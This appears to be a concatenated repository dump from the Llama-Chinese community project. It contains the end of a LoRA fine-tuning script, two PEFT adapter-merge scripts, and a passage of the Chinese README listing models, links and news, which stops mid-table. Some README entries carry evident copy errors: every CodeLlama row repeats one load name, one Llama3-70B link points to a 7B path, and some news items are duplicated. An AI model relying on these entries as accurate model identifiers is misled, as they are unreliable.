len(column_names)==1: text_column_name = "text" if "text" in column_names else column_names[0] elif len(column_names)==2: input_column_name = 'input' if 'input' in column_names else column_names[0] target_column_name = 'target' if 'target' in column_names else column_names[0] train_on_inputs=False else: raise ValueError('输入文件列数不对') print('train_on_inputs',train_on_inputs) # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer([ item for item in examples[text_column_name]],truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) output['labels'] = output['input_ids'].copy() return output def tokenize(prompt): result = tokenizer(prompt,truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) result["labels"] = result["input_ids"].copy() return result def generate_and_tokenize_prompt(data_point): input_text = data_point[input_column_name] target_text = data_point[target_column_name] full_prompt = input_text+target_text tokenized_full_prompt = tokenize(full_prompt) if not train_on_inputs: user_prompt = input_text tokenized_user_prompt = tokenize(user_prompt) user_prompt_len = len(tokenized_user_prompt["input_ids"]) tokenized_full_prompt["labels"] = [ -100 ] * user_prompt_len + tokenized_full_prompt["labels"][ user_prompt_len: ] return tokenized_full_prompt with training_args.main_process_first(desc="dataset map tokenization"): if not data_args.streaming: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset", ) else: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, remove_columns=column_names, ) if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 2048: block_size = 2048 else: block_size = min(data_args.block_size, tokenizer.model_max_length) if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = tokenized_datasets["train"] if data_args.max_train_samples is not None: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) for index in random.sample(range(len(train_dataset)), 3): logger.info(f"Sample {index} of the training set: {train_dataset[index]}.") train_dataset = train_dataset.shuffle(seed=training_args.seed) if training_args.do_eval: if "validation" not in tokenized_datasets: raise ValueError("--do_eval requires a validation dataset") eval_dataset = tokenized_datasets["validation"] if data_args.max_eval_samples is not None: max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) metric = evaluate.load("accuracy.py") def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) # .reshape(-1) preds = preds[:, :-1].reshape(-1) # .reshape(-1) # print(labels.shape) # true_predictions = [ # [p for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # true_labels = [ # [l for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # preds = np.array(true_predictions).reshape(-1) # labels = np.array(true_labels).reshape(-1) return metric.compute(predictions=preds, references=labels) # layer_norm_names=[] model = get_peft_model(model, lora_config) model.print_trainable_parameters() # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, # Data collator will default to DataCollatorWithPadding, so we change it. data_collator=transformers.DataCollatorForSeq2Seq( tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True ), compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available()else None, callbacks=([SavePeftModelCallback] if isinstance(model, PeftModel) else None), ) # Training if training_args.do_train: checkpoint = None '''if training_args.resume_from_checkpoint is not None: resume_from_checkpoint = training_args.resume_from_checkpoint checkpoint_name = os.path.join(resume_from_checkpoint, "pytorch_model.bin") if not os.path.exists(checkpoint_name): checkpoint_name = os.path.join( resume_from_checkpoint, "adapter_model.bin" ) # only LoRA model - LoRA config above has to fit resume_from_checkpoint = ( False # So the trainer won't try loading its state ) # The two files above have a different name depending on how they were saved, but are actually the same. if os.path.exists(checkpoint_name): print(f"Restarting from {checkpoint_name}") adapters_weights = torch.load(checkpoint_name) set_peft_model_state_dict(model, adapters_weights) else: print(f"Checkpoint {checkpoint_name} not found") # checkpoint = Fa''' if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint if torch.__version__ >= "2" and sys.platform != "win32": model = torch.compile(model) train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main() File: train/merge_peft_model/merge_muilt_peft_adapter.py from dataclasses import dataclass, field from typing import Optional,List import peft import torch from peft import PeftConfig, PeftModel,PeftModelForSequenceClassification from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer, HfArgumentParser,AutoModelForSequenceClassification from peft.utils import _get_submodules @dataclass class ScriptArguments: """ The name of the Casual LM model we wish to fine with PPO """ adapter_model_name: Optional[List[str]] = field(default=None, metadata={"help": "the model name"}) output_name: Optional[str] = field(default=None, metadata={"help": "the model name"}) parser = HfArgumentParser(ScriptArguments) script_args = parser.parse_args_into_dataclasses()[0] base_model = None for one_lora_path in script_args.adapter_model_name: if base_model==None: peft_config = PeftConfig.from_pretrained(one_lora_path) tokenizer = AutoTokenizer.from_pretrained(peft_config.base_model_name_or_path) tokenizer.save_pretrained(f"{script_args.output_name}") base_model = AutoModelForCausalLM.from_pretrained(peft_config.base_model_name_or_path, return_dict=True, torch_dtype=torch.bfloat16) peft_config = PeftConfig.from_pretrained(one_lora_path) base_model = PeftModel.from_pretrained(base_model, one_lora_path,device_map={"": 0}) # model = AutoModelForCausalLM.from_pretrained(peft_config.base_model_name_or_path, return_dict=True, device_map='auto',load_in_8bit=True) # Load the Lora model base_model = base_model.merge_and_unload() base_model.eval() # key_list = [key for key, _ in model.base_model.model.named_modules() if "lora" not in key] # for key in key_list: # print(key) # parent, target, target_name = _get_submodules(model.base_model,key) # if isinstance(target, peft.tuners.lora.Linear): # print('peft.tuners.lora.Linear') # bias = target.bias is not None # new_module = torch.nn.Linear(target.in_features, target.out_features, bias=bias) # model.base_model._replace_module(parent, target_name, new_module, target) # model = model.base_model.model base_model.save_pretrained(f"{script_args.output_name}") # model.push_to_hub(f"{script_args.output_name}", use_temp_dir=False) File: train/merge_peft_model/merge_peft_adapter.py from dataclasses import dataclass, field from typing import Optional import peft import torch from peft import PeftConfig, PeftModel,PeftModelForSequenceClassification from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer, HfArgumentParser,AutoModelForSequenceClassification from peft.utils import _get_submodules @dataclass class ScriptArguments: """ The name of the Casual LM model we wish to fine with PPO """ adapter_model_name: Optional[str] = field(default=None, metadata={"help": "the model name"}) load8bit : Optional[bool] = field(default=None, metadata={"help": "the model type"}) output_name: Optional[str] = field(default=None, metadata={"help": "the model name"}) tokenizer_fast:Optional[bool] = field(default=None, metadata={"help": "the model type"}) parser = HfArgumentParser(ScriptArguments) script_args = parser.parse_args_into_dataclasses()[0] peft_config = PeftConfig.from_pretrained(script_args.adapter_model_name) model = AutoModelForCausalLM.from_pretrained(peft_config.base_model_name_or_path, return_dict=True, torch_dtype=torch.float16,device_map='auto',trust_remote_code=True) model = PeftModel.from_pretrained(model, script_args.adapter_model_name,device_map='auto') tokenizer = AutoTokenizer.from_pretrained(peft_config.base_model_name_or_path,use_fast=script_args.tokenizer_fast) config = AutoConfig.from_pretrained(peft_config.base_model_name_or_path) architecture = config.architectures[0] print(architecture) # Load the Lora model model = model.merge_and_unload() model.eval() model.save_pretrained(f"{script_args.output_name}") tokenizer.save_pretrained(f"{script_args.output_name}") if script_args.load8bit: model = AutoModelForCausalLM.from_pretrained(script_args.output_name, torch_dtype=torch.float16,load_in_8bit=script_args.load8bit,device_map='auto',trust_remote_code=True) model.save_pretrained(f"{script_args.output_name}",max_shard_size='5GB')
<p align="left"> <a href="README_EN.md">English</a> | 中文 </p> <h1 align="center"> Llama中文社区 </h1> <p align="center" width="100%"> <img src="assets/llama.jpg" alt="Llama" style="width: 20%; display: block; margin: auto;"></a> </p> <p align="center"> <font face="黑体" color=orange size="6"> Llama3体验和微调已开放,最好的中文Llama大模型 </font> </p> <p align="center"> 🤗 <a href="https://huggingface.co/FlagAlpha" target="_blank">Hugging Face</a> • 🤖 <a href="https://www.modelscope.cn/organization/FlagAlpha/" target="_blank">ModelScope</a> • ✡️ <a href="https://wisemodel.cn/models/FlagAlpha/Atom-7B-Chat" target="_blank">WiseModel</a> </p> <p align="center"> <a href="https://llama.family">Llama3.1 在线体验(包含Llama2):https://llama.family</a> </p> <p align="center"> <a href="https://huggingface.co/FlagAlpha/Atom-7B-Chat">基于Llama的开源中文预训练大模型Atom</a> </p> </br></br> ## 🗂️ 目录 - [📌 Llama中文社区](#-llama中文社区) * [🔥 社区介绍:Llama中文社区](#-社区介绍llama中文社区) * [📢 最新动态](#-最新动态) * [🤗 模型](#-模型) + [🤗 中文预训练模型Atom-7B](#-中文预训练模型atom) + [🤗 Llama3官方模型](#llama3官方模型) + [🤗 Llama3中文微调模型](#llama3中文微调模型) + [🤗 Llama2官方模型](#llama2官方模型) + [🤗 Llama2中文微调模型](#llama2中文微调模型) * [🌟 社区资源](#社区资源) - [📌 如何使用Llama模型?](#-如何使用llama模型) - [快速上手-使用Anaconda](#快速上手-使用anaconda) - [快速上手-使用Docker](#快速上手-使用docker) - [快速上手-使用llama.cpp](#快速上手-使用llamacpp) - [快速上手-使用gradio](#快速上手-使用gradio) - [快速上手-构建API服务](#快速上手-构建api服务) - [快速上手-使用ollama运行](#快速上手-使用ollama运行) + [🤖 模型预训练](#-模型预训练) + [💡 模型微调](#-模型微调) - [Step1: 环境准备](#step1-环境准备) - [Step2: 数据准备](#step2-数据准备) - [Step3: 微调脚本](#step3-微调脚本) * [LoRA微调](#lora微调) * [全量参数微调](#全量参数微调) - [Step4: 加载微调模型](#step4-加载微调模型) * [LoRA微调](#lora微调-1) * [全量参数微调](#全量参数微调-1) + [🍄 模型量化](#-模型量化) + [🚀 部署加速](#-部署加速) - [TensorRT-LLM](#tensorrt-llm) - [vLLM](#vllm) - [JittorLLMs](#jittorllms) - [lmdeploy](#lmdeploy) + [💪 外延能力](#-外延能力) - [LangChain](#langchain) * [🥇 模型评测](#-模型评测) + [Llama2和Llama3对比评测](#llama2和llama3对比评测) + [Llama3模型评测](#llama3模型评测) + [Llama2模型评测](#llama2模型评测) * [📖 学习中心](#-学习中心) + [Llama3](#llama3) + [Llama2](#llama2) - [Meta官方对于Llama2的介绍](#meta官方对于llama2的介绍) + [Llama相关论文](#llama相关论文) - [📌 其它](#-其它) * [🎉 致谢](#-致谢) * [🤔 问题反馈](#-问题反馈) ## 📌 Llama中文社区 ### 🔥 社区介绍:llama中文社区 欢迎来到Llama中文社区!我们是一个专注于Llama模型在中文方面的优化和上层建设的高级技术社区。 **已经基于大规模中文数据,从预训练开始对Llama2模型进行中文能力的持续迭代升级【Done】**。**正在对Llama3模型进行中文能力的持续迭代升级【Doing】** 我们热忱欢迎对大模型LLM充满热情的开发者和研究者加入我们的行列。 <details> #### 为什么选择Llama中文社区? 🚀 **高级工程师团队支持**:社区有一批专注为大家服务的NLP高级工程师,我们有着强大的技术支持和丰富的经验,为您提供专业的指导和帮助。 🎯 **中文优化**:我们致力于在Llama模型的中文处理方面进行优化,探索适用于中文的最佳实践,以提升其性能和适应性【支持Llama2、Llama3】。 💡 **创新交流**:我们拥有一支富有创造力和经验的社区成员团队,定期组织线上活动、技术研讨和经验分享,促进成员间的创新交流。 🌐 **全球联结**:我们欢迎来自世界各地的开发者加入社区,构建一个开放、多元化的学习和交流平台。 🤝 **开放共享**:我们鼓励社区成员开源分享代码和模型,推动合作共赢,共同促进中文NLP技术的发展。 #### 社区活动 🗓️ **线上讲座**:邀请行业内专家进行线上讲座,分享Llama在中文NLP领域的最新技术和应用,探讨前沿研究成果。 💻 **项目展示**:成员可展示自己在Llama中文优化方面的项目成果,获得反馈和建议,促进项目协作。 📚 **学习资源**:社区维护丰富的学习资料库,包括教程、文档和论文解读,为成员提供全面的学习支持。 📝 **论文解读**:社区成员共同解读与Llama相关的最新研究论文,深入理解前沿算法和方法。 🎉 **主题活动**:定期举办各类主题活动,包括挑战赛、黑客马拉松和技术沙龙,让社区成员在轻松愉快的氛围中交流和学习。 🌟 **奖励计划**:我们设立奖励计划,对社区中积极参与、贡献优秀的成员给予荣誉和奖励,激励更多优秀人才的加入。 📈 **技术咨询**:我们提供技术咨询服务,解答您在Llama开发和优化过程中遇到的问题,助您快速攻克难关。 🚀 **项目合作**:鼓励成员间的项目合作,共同探索Llama在实际应用中的潜力,打造创新解决方案。 #### 立即加入我们! 📚 **愿景**:无论您是对Llama已有研究和应用经验的专业开发者,还是对Llama中文优化感兴趣并希望深入探索的新手,我们都热切期待您的加入。在Llama中文社区,您将有机会与行业内顶尖人才共同交流,携手推动中文NLP技术的进步,开创更加美好的技术未来! 🔗 **温馨提示**:本社区为专业技术交流平台,我们热切期望志同道合的开发者和研究者加入。请遵守社区准则,共同维护积极向上的学习氛围。感谢您的理解和支持! </details> ### 📢 最新动态 【最新】2024年07月24日:开源最强[Llama 3.1](https://llama.meta.com/docs/overview)模型发布,包含8B、70B和405B! 【最新】2024年07月16日:[社区论坛](https://forum.llamafamily.cn/)上线,有大模型问题,就找Llama中文社区! 【最新】2024年05月15日:支持ollama运行Llama3-Chinese-8B-Instruct、Atom-7B-Chat,[详细使用方法](https://github.com/LlamaFamily/Llama-Chinese?tab=readme-ov-file#%E5%BF%AB%E9%80%9F%E4%B8%8A%E6%89%8B-%E4%BD%BF%E7%94%A8ollama%E8%BF%90%E8%A1%8C)。 【最新】2024年04月23日:社区增加了llama3 8B中文微调模型[Llama3-Chinese-8B-Instruct](https://github.com/LlamaFamily/Llama-Chinese?tab=readme-ov-file#llama3%E4%B8%AD%E6%96%87%E5%BE%AE%E8%B0%83%E6%A8%A1%E5%9E%8B)以及对应的[免费API调用](https://llama.family/docs/chat-completion-v1)。 【最新】2024年04月19日:社区增加了llama3 8B、llama3 70B[在线体验链接](https://llama.family/chat/#/)。 【最新】2024年04月14日:社区更新了四个专家角色:心理咨询师、羊驼夸夸 、律师、医生。链接:[角色role](https://llama.family/tools/#/agent)。 【最新】2024年04月10日:Atom-7B-Chat 模型回答内容相较之前更为丰富、增强了模型的指令遵循能力和回答稳定性、优化了ppo的奖励模型。下载链接[modelscope](https://modelscope.cn/models/FlagAlpha/Atom-7B-Chat)、[Huggingface](https://huggingface.co/FlagAlpha/Atom-7B-Chat)。 【最新】2024年04月01日:社区上线了Llama中文[应用平台](https://llama.family/store);同时如果你有优秀的的应用需要推广可以填写[申请表](https://atomecho.feishu.cn/share/base/form/shrcnFqpN71OmBoXDCT6y0TQgIc)。 【最新】2024年03月08日:开放了免费API供大家使用,包含(Atom-1B,7B,13B 3种中文大模型)[API使用链接](https://llama.family/docs/chat-completion-v1) 【最新】2024年04月14日:社区更新了四个专家角色:心理咨询师、羊驼夸夸 、律师、医生。链接:[角色role](https://llama.family/tools/#/agent)。 【最新】2024年04月10日:Atom-7B-Chat 模型回答内容相较之前更为丰富、增强了模型的指令遵循能力和回答稳定性、优化了ppo的奖励模型。下载链接[modelscope](https://modelscope.cn/models/FlagAlpha/Atom-7B-Chat)、[Huggingface](https://huggingface.co/FlagAlpha/Atom-7B-Chat)。 【最新】2024年04月01日:社区上线了Llama中文[应用平台](https://llama.family/store);同时如果你有优秀的的应用需要推广可以填写[申请表](https://atomecho.feishu.cn/share/base/form/shrcnFqpN71OmBoXDCT6y0TQgIc)。 【最新】2024年03月28日:[社区免费公开课](https://mp.weixin.qq.com/s/CsturoU1pOX11CqVnZgu2A)。 【最新】2024年03月08日:开放了免费API供大家使用,包含(Atom-1B,7B,13B 3种中文大模型)[API使用链接](https://llama.family/docs/chat-completion-v1) 【最新】2023年10月8日:新增清华大学JittorLLMs的推理加速功能[JittorLLMs](#jittorllms)! <details> - 2023年9月12日:更新预训练版本[Atom-7B](https://huggingface.co/FlagAlpha/Atom-7B)和对话版本[Atom-7B-Chat](https://huggingface.co/FlagAlpha/Atom-7B-Chat)模型参数,最新的中文预训练数据量为2.7TB token,训练进程见[llama.family](https://llama.family/)! - 2023年9月2日:新增模型[预训练代码](#-模型预训练)和[全量参数微调代码](#-模型微调)! - 2023年8月28日:发布基于Llama2进行中文预训练的开源大模型[Atom-7B](https://huggingface.co/FlagAlpha/Atom-7B),并将持续更新,详情参考[社区公众号文章](https://mp.weixin.qq.com/s/Bdx0JTVh1kgPn5ydYxIkEw)! - 2023年8月26日:提供[FastAPI](#fastapi接口搭建)接口搭建脚本! - 2023年8月26日:提供将Meta原始模型参数转换为兼容Hugging Face的[格式转化脚本](https://github.com/LlamaFamily/Llama-Chinese/blob/main/scripts/convert2hf/README.md)! - 2023年8月26日:新增[Code Llama](#-代码模型)模型! - 2023年8月15日:新增[PEFT加载微调模型参数](#加载微调模型)的代码示例! - 2023年8月14日:[大模型数据共享训练平台](https://llama.family)上线,没有算力也能参与大模型训练,社区每位成员贡献的数据都将决定模型能力的未来走向! - 2023年8月3日:新增FasterTransformer和vLLM的GPU[推理加速](#-推理加速)支持! - 2023年7月31日:【重磅】国内首个真正意义上的Llama2中文大模型发布!详情参见[社区公众号文章](https://mp.weixin.qq.com/s/lExUU7z_MvgJ7tzQPF8tUQ) - 2023年7月28日:通过[Docker部署](#docker部署问答接口)问答接口! - 2023年7月27日:新增[LangChain](#langchain)支持! - 2023年7月26日:新增Llama2-13B中文微调参数的[4bit量化压缩版本](#-模型量化)! - 2023年7月25日:社区微信公众号“Llama中文社区”欢迎大家关注,获取最新分享和动态! - 2023年7月24日:[FlagAlpha](https://huggingface.co/FlagAlpha)新增Llama2-13B中文微调参数! - 2023年7月24日:[llama.family](https://llama.family/)新增Llama2-70B在线体验! - 2023年7月23日:Llama2中文微调参数发布至Hugging Face仓库[FlagAlpha](https://huggingface.co/FlagAlpha)! - 2023年7月22日:Llama2在线体验链接[llama.family](https://llama.family/)上线,同时包含Meta原版和中文微调版本! - 2023年7月21日:评测了Meta原始版Llama2 Chat模型的[中文问答能力](#-模型评测)! - 2023年7月21日:新增Llama2模型的Hugging Face版本国内下载地址! - 2023年7月20日:新增[飞书知识库文档](https://chinesellama.feishu.cn/wiki/space/7257824476874768388?ccm_open_type=lark_wiki_spaceLink),欢迎大家一起共建! - 2023年7月20日:国内Llama2最新下载地址上线! - 2023年7月19日:正式启动Llama2模型的中文预训练,关注我们获取实时动态! - 2023年7月19日:Llama2国内下载地址正在启动,敬请期待! - 2023年7月19日:开启Llama2中文社区,欢迎大家加入! </details> ### 🤗 模型 #### 🔵 中文预训练模型Atom **原子大模型Atom**由Llama中文社区和原子回声联合打造。 | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | --------------- | --------------- | ------------------------------ | ------------------------------------------------------------ | | 预训练 | Atom-7B | FlagAlpha/Atom-7B | [HuggingFace](https://huggingface.co/FlagAlpha/Atom-7B) \| [ModelScope](https://modelscope.cn/models/FlagAlpha/Atom-7B) \| [WiseModel](https://wisemodel.cn/models/FlagAlpha/Atom-7B) | | Chat | Atom-7B-Chat | FlagAlpha/Atom-7B-Chat | [HuggingFace](https://huggingface.co/FlagAlpha/Atom-7B-Chat) \| [ModelScope](https://modelscope.cn/models/FlagAlpha/Atom-7B-Chat) \| [WiseModel](https://wisemodel.cn/models/FlagAlpha/Atom-7B-Chat)| Atom系列模型包含Atom-13B、Atom-7B和Atom-1B,基于Llama2做了中文能力的持续优化。Atom-7B和Atom-7B-Chat目前已完全开源,支持商用,可在[Hugging Face](https://huggingface.co/FlagAlpha)仓库获取模型,详情见[Atom-7B下载](#基于llama2的中文预训练模型atom)。Atom大模型针对中文做了以下优化: - 大规模的中文数据预训练 原子大模型Atom在Llama2的基础上,采用大规模的中文数据进行持续预训练,包含百科、书籍、博客、新闻、公告、小说、金融数据、法律数据、医疗数据、代码数据、专业论文数据、中文自然语言处理竞赛数据集等,详见[📝 数据来源](#-数据来源)。 同时对庞大的数据进行了过滤、打分、去重,筛选出超过1T token的高质量中文数据,持续不断加入训练迭代中。 - 更高效的中文词表 为了提高中文文本处理的效率,我们针对Llama2模型的词表进行了深度优化。首先,我们基于数百G的中文文本,在该模型词表的基础上扩展词库至65,000个单词。经过测试,我们的改进使得中文编码/解码速度提高了约350%。此外,我们还扩大了中文字符集的覆盖范围,包括所有emoji符号😊。这使得生成带有表情符号的文章更加高效。 - 自适应上下文扩展 Atom大模型默认支持4K上下文,利用位置插值PI和Neural Tangent Kernel (NTK)方法,经过微调可以将上下文长度扩增到32K。 - 📝 中文数据 我们通过以下数据来优化Llama2的中文能力: | 类型 | 描述 | | ---------------------------------------------------------- | ------------------------------------------------------------ | | 网络数据 | 互联网上公开的网络数据,挑选出去重后的高质量中文数据,涉及到百科、书籍、博客、新闻、公告、小说等高质量长文本数据。 | | [Wikipedia](https://github.com/goldsmith/Wikipedia) | 中文Wikipedia的数据 | | [悟道](https://github.com/BAAI-WuDao/Model) | 中文悟道开源的200G数据 | | [Clue](https://github.com/CLUEbenchmark/CLUEDatasetSearch) | Clue开放的中文预训练数据,进行清洗后的高质量中文长文本数据 | | 竞赛数据集 | 近年来中文自然语言处理多任务竞赛数据集,约150个 | | [MNBVC](https://github.com/esbatmop/MNBVC) | MNBVC 中清洗出来的部分数据集 社区提供预训练版本Atom-7B和基于Atom-7B进行对话微调的模型参数供开放下载,关于模型的进展详见社区官网[llama.family](https://llama.family)。 #### Llama3官方模型 | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | ---------- | ---------- | ------------------------- | --------------------- | | 预训练 | Llama3-8B | meta-llama/Meta-Llama-3-8B | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-8B) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | | 预训练 | Llama3-70B | meta-llama/Meta-Llama-3-70B | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-7B) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | | 对话模型 | Llama3-8B-Chat | meta-llama/Meta-Llama-3-8B-Instruct | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-8B-Instruct) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | | 对话模型 | Llama3-70B-Chat | meta-llama/Meta-Llama-3-70B-Instruct | [HuggingFace](https://huggingface.co/meta-llama/Meta-Llama-3-70B-Instruct) \| [百度网盘](https://pan.baidu.com/s/1gBZ7wEn3gC8VRok0Onh9BQ?pwd=8frq) | #### Llama3中文微调模型 | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | ---------- | ---------- | ------------------------- | --------------------- | | 对话模型 | Llama3-Chinese-8B-Instruct | FlagAlpha/Llama3-Chinese-8B-Instruct | [HuggingFace](https://huggingface.co/FlagAlpha/Llama3-Chinese-8B-Instruct) \| [modelscope](https://modelscope.cn/models/FlagAlpha/Llama3-Chinese-8B-Instruct/summary) \| [wisemodel](https://wisemodel.cn/models/FlagAlpha/Llama3-Chinese-8B-Instruct/file) | #### Llama2官方模型 <details> | 类别 | 模型名称 | 🤗模型加载名称 | 下载地址 | | ---------- | ---------- | ------------------------- | --------------------- | | 预训练 | Llama2-7B | meta-llama/Llama-2-7b-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-7b-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_t0dUikZqOwt-5DZWHuMvqA1?pwd=66ep) | | 预训练 | Llama2-13B | meta-llama/Llama-2-13b-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-13b-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_yT_9G8xNOz0SDWQ7Mb_GZA1?pwd=yvgf) | | 预训练 | Llama2-70B | meta-llama/Llama-2-70b-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-70b-hf) | | Chat | Llama2-7B-Chat | meta-llama/Llama-2-7b-chat-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-7b-chat-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_oaV4BpKFgKLto4KgOhBcaA1?pwd=ufir) | | Chat | Llama2-13B-Chat | meta-llama/Llama-2-13b-chat-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VN_yA-9G34NGL9B79b3OQZZGA1?pwd=xqrg) | | Chat | Llama2-70B-Chat | meta-llama/Llama-2-70b-chat-hf | [HuggingFace](https://huggingface.co/meta-llama/Llama-2-70b-chat-hf) \| [迅雷网盘](https://pan.xunlei.com/s/VNa_vCGzCy3h3N7oeFXs2W1hA1?pwd=uhxh#) | | Code | CodeLlama-7b | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1cIPzdNywWLvQI7_2QanOEQ?pwd=zfwi) | | Code | CodeLlama-7b-Python | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1liY8klGoDagYbpw-g-oFag?pwd=i952) | | Code | CodeLlama-7b-Instruct | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/108o9_DT2E_vfSGtOnDCQVw?pwd=zkt9) | | Code | CodeLlama-13b | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1lLaeHv0XEBv0iiZzI1dpnw?pwd=qn99) | | Code | CodeLlama-13b-Python | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1OLVfvZS_oqL3oqMKwsI87w?pwd=a78k) | | Code | CodeLlama-13b-Instruct | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1HyxJl4w8wElgkZRh2ATrXQ?pwd=seg6) | | Code | CodeLlama-34b | meta-llama/Llama-2-70b-chat-hf | [迅雷网盘](https://pan.baidu.com/s/1vEw0pFgIkctPUN4_5_6pIQ?pwd=q8eu) | Meta官方在2023年8月24日发布了Code Llama,基于代码数据对Llama2进行了微调,提供三个不同功能的版本:基础模型(Code Llama)、Python专用模型(Code Llama - Python)和指令跟随模型(Code Llama - Instruct),包含7B、13B、34B三种不同参数规模。不同模型能力区别如下表所示: | 模型类别 | 模型名称 | 代码续写 | 代码填充 | 指令编程 | |-----------------------|------------------------|------|------|------| | Code Llama | CodeLlama-7b | ✅ | ✅ | ❌ | | | CodeLlama-13b | ✅ | ✅ | ❌ | | | CodeLlama-34b | ✅ | ❌ | ❌ | | Code Llama - Python | CodeLlama-7b-Python | ✅ | ❌ | ❌ | | | CodeLlama-13b-Python | ✅ | ❌ | ❌ | | | CodeLlama-34b-Python | ✅ | ❌ | ❌ | | Code Llama - Instruct | CodeLlama-7b-Instruct | ❌ | ✅ | ✅ | | | CodeLlama-13b-Instruct | ❌ | ✅ | ✅ | | | CodeLlama-34b-Instruct | ❌ | ❌ | ✅ | 关于Code Llama的详细信息可以参考官方Github仓库[codellama](https://github.com/facebookresearch/codellama)。 </details> #### Llama2中文微调模型 我们基于中文指令数据集对Llama2-Chat模型进行了微调,使得Llama2模型有着更强的中文对话能力。LoRA参数以及与基础模型合并的参数均已上传至[Hugging Face](https://huggingface.co/FlagAlpha),目前包含7B和13B的模型。 | 类别 | 模型名称 | 🤗模型加载名称 | 基础模型版本 | 下载地址 | | ---------- | ---------- | ------------- | ----------------- | ------------------- | | 合并参数 | Llama2-Chinese-7b-Chat | FlagAlpha/Llama2-Chinese-7b-Chat | meta-llama/Llama-2-7b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-7b-Chat) | | 合并参数 | Llama2-Chinese-13b-Chat | FlagAlpha/Llama2-Chinese-13b-Chat| meta-llama/Llama-2-13b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat) | | LoRA参数 | Llama2-Chinese-7b-Chat-LoRA | FlagAlpha/Llama2-Chinese-7b-Chat-LoRA | meta-llama/Llama-2-7b-chat-hf |[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-7b-Chat-LoRA) | | LoRA参数 | Llama2-Chinese-13b-Chat-LoRA | FlagAlpha/Llama2-Chinese-13b-Chat-LoRA | meta-llama/Llama-2-13b-chat-hf 